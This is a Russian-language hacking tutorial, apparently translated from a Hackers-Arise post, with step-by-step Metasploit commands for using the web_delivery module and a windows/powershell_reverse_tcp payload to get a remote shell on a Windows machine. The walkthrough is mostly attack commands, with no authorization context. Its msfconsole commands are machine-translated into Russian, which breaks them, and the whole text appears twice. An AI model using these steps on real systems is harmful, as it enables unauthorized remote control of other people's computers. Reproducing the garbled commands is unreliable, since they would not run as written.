Добро пожаловать обратно, мои поклонники Metasploit!
В предыдущей части этой серии мы рассмотрели, как использовать эксплойт веб-доставки Metasploit для создания скрипта для подключения к машинам UNIX, Linux или OS X с помощью Python. Многие участники сообщества Hackers-Arise спрашивали меня: «Можно ли сделать то же самое для систем Windows?» Ответ — ДА!
Хотя эксплойт для веб-доставки будет работать в системах Windows с установленным Python, лишь немногие системы Windows на самом деле имеют Python. С другой стороны, практически во всех системах UNIX, Linux и OS X Python установлен по умолчанию. К счастью, в этих системах Windows PowerShell установлен по умолчанию, и мы можем использовать его вместе с эксплойтом для веб-доставки Metasploit, чтобы получить контроль над этими системами.
В этом руководстве мы воспользуемся эксплойтом веб-доставки Metasploit, чтобы получить контроль над системой Windows через PowerShell.
Шаг 1: Запустите Metasploit
Для начала запустите систему Kali, откройте терминал и запустите Metasploit.
kali > msfconsole
Шаг 2: Загрузка эксплойта веб-доставки
Как уже упоминалось выше, использование веб-доставки Metasploit очень похоже на веб-доставку в системах Unix, Linux и OS X, за исключением того, что в системах Windows Python по умолчанию не установлен. Поэтому нам потребуется использовать Windows PowerShell, а для PowerShell существует специальный модуль веб-доставки.
Давайте загрузим эксплойт веб-доставки в Metasploit;
msf > использовать exploit/multi/script/web_delivery
Далее нам необходимо настроить LHOST и LPORT точно так же, как мы это делали с эксплойтом веб-доставки Unix/Linux/OS X.
msf > установить LHOST 192.168.1.153
msf > установить LPORT 444 4
Затем нам нужно задать URIPATH . Это задаёт URI, который будет размещаться на веб-сервере и к которому будет подключаться команда PowerShell. Значение можно указать любое. Я указал здесь «powersploit», но вы можете указать любое другое.
msf > set URIPATH powersploit
Шаг 3: Установите цель PowerShell
По умолчанию эксплойт веб-доставки в Metasploit использует скрипты Python. Чтобы использовать PowerShell для Windows, нужно установить целевой уровень 2 .
msf > установить цель 2
Если установить цель 2, Metasploit создаст скрипт PowerShell, а не скрипт Python, когда мы будем готовы к эксплуатации.
Шаг 4: Установка полезной нагрузки
Наконец, нам нужно настроить полезную нагрузку. Давайте используем полезную нагрузку windows/powershell_reverse_tcp .
msf > установить полезную нагрузку windows/powershell_reverse_tcp
Прежде чем начать эксплойт, давайте проверим параметры, чтобы убедиться, что все они установлены правильно.
msf > показать параметры
Теперь мы можем ввести exploit , и Metasploit запустит небольшой веб-сервер в фоновом режиме и сгенерирует команду, которую мы сможем использовать в целевой системе Windows.
msf > эксплуатировать
Затем откройте командную строку в целевой системе Windows и выполните команду, сгенерированную Metasploit, как показано ниже.
После нажатия Enter эта команда откроет соединение с атакующей машиной.
Теперь в атакующей системе мы можем проверить, открыт ли сеанс, введя:
msf > сеансы -l
Как вы можете видеть выше, у нас открыт сеанс с идентификатором 1. Мы можем использовать этот сеанс, введя:
msf > сеансы -i 1
Где 1 — идентификатор сеанса. Если идентификатор вашего сеанса отличается, например, 2, 3 и т. д., используйте этот идентификатор в команде выше, например, «sessions -i 2».
Теперь у нас есть сеанс на машине с Windows. Успех! Теперь эта система у нас!
Теперь мы можем проверить запущенные процессы в целевой системе, введя:
PS C: UsersOTW > Get-Process
Теперь, когда мы подключены к PowerShell на машине Windows, мы можем запускать любые «команды» PowerShell , а также наиболее распространенные команды Linux (ls, ps, cd, grep, cat, pwd и т. д.).
В предыдущей части этой серии мы рассмотрели, как использовать эксплойт веб-доставки Metasploit для создания скрипта для подключения к машинам UNIX, Linux или OS X с помощью Python. Многие участники сообщества Hackers-Arise спрашивали меня: «Можно ли сделать то же самое для систем Windows?» Ответ — ДА!
Хотя эксплойт для веб-доставки будет работать в системах Windows с установленным Python, лишь немногие системы Windows на самом деле имеют Python. С другой стороны, практически во всех системах UNIX, Linux и OS X Python установлен по умолчанию. К счастью, в этих системах Windows PowerShell установлен по умолчанию, и мы можем использовать его вместе с эксплойтом для веб-доставки Metasploit, чтобы получить контроль над этими системами.
В этом руководстве мы воспользуемся эксплойтом веб-доставки Metasploit, чтобы получить контроль над системой Windows через PowerShell.
Шаг 1: Запустите Metasploit
Для начала запустите систему Kali, откройте терминал и запустите Metasploit.
kali > msfconsole
Шаг 2: Загрузка эксплойта веб-доставки
Как уже упоминалось выше, использование веб-доставки Metasploit очень похоже на веб-доставку в системах Unix, Linux и OS X, за исключением того, что в системах Windows Python по умолчанию не установлен. Поэтому нам потребуется использовать Windows PowerShell, а для PowerShell существует специальный модуль веб-доставки.
Давайте загрузим эксплойт веб-доставки в Metasploit;
msf > использовать exploit/multi/script/web_delivery
Далее нам необходимо настроить LHOST и LPORT точно так же, как мы это делали с эксплойтом веб-доставки Unix/Linux/OS X.
msf > установить LHOST 192.168.1.153
msf > установить LPORT 444 4
Затем нам нужно задать URIPATH . Это задаёт URI, который будет размещаться на веб-сервере и к которому будет подключаться команда PowerShell. Значение можно указать любое. Я указал здесь «powersploit», но вы можете указать любое другое.
msf > set URIPATH powersploit
Шаг 3: Установите цель PowerShell
По умолчанию эксплойт веб-доставки в Metasploit использует скрипты Python. Чтобы использовать PowerShell для Windows, нужно установить целевой уровень 2 .
msf > установить цель 2
Если установить цель 2, Metasploit создаст скрипт PowerShell, а не скрипт Python, когда мы будем готовы к эксплуатации.
Шаг 4: Установка полезной нагрузки
Наконец, нам нужно настроить полезную нагрузку. Давайте используем полезную нагрузку windows/powershell_reverse_tcp .
msf > установить полезную нагрузку windows/powershell_reverse_tcp
Прежде чем начать эксплойт, давайте проверим параметры, чтобы убедиться, что все они установлены правильно.
msf > показать параметры
Теперь мы можем ввести exploit , и Metasploit запустит небольшой веб-сервер в фоновом режиме и сгенерирует команду, которую мы сможем использовать в целевой системе Windows.
msf > эксплуатировать
Затем откройте командную строку в целевой системе Windows и выполните команду, сгенерированную Metasploit, как показано ниже.
После нажатия Enter эта команда откроет соединение с атакующей машиной.
Теперь в атакующей системе мы можем проверить, открыт ли сеанс, введя:
msf > сеансы -l
Как вы можете видеть выше, у нас открыт сеанс с идентификатором 1. Мы можем использовать этот сеанс, введя:
msf > сеансы -i 1
Где 1 — идентификатор сеанса. Если идентификатор вашего сеанса отличается, например, 2, 3 и т. д., используйте этот идентификатор в команде выше, например, «sessions -i 2».
Теперь у нас есть сеанс на машине с Windows. Успех! Теперь эта система у нас!
Теперь мы можем проверить запущенные процессы в целевой системе, введя:
PS C: UsersOTW > Get-Process
Теперь, когда мы подключены к PowerShell на машине Windows, мы можем запускать любые «команды» PowerShell , а также наиболее распространенные команды Linux (ls, ps, cd, grep, cat, pwd и т. д.).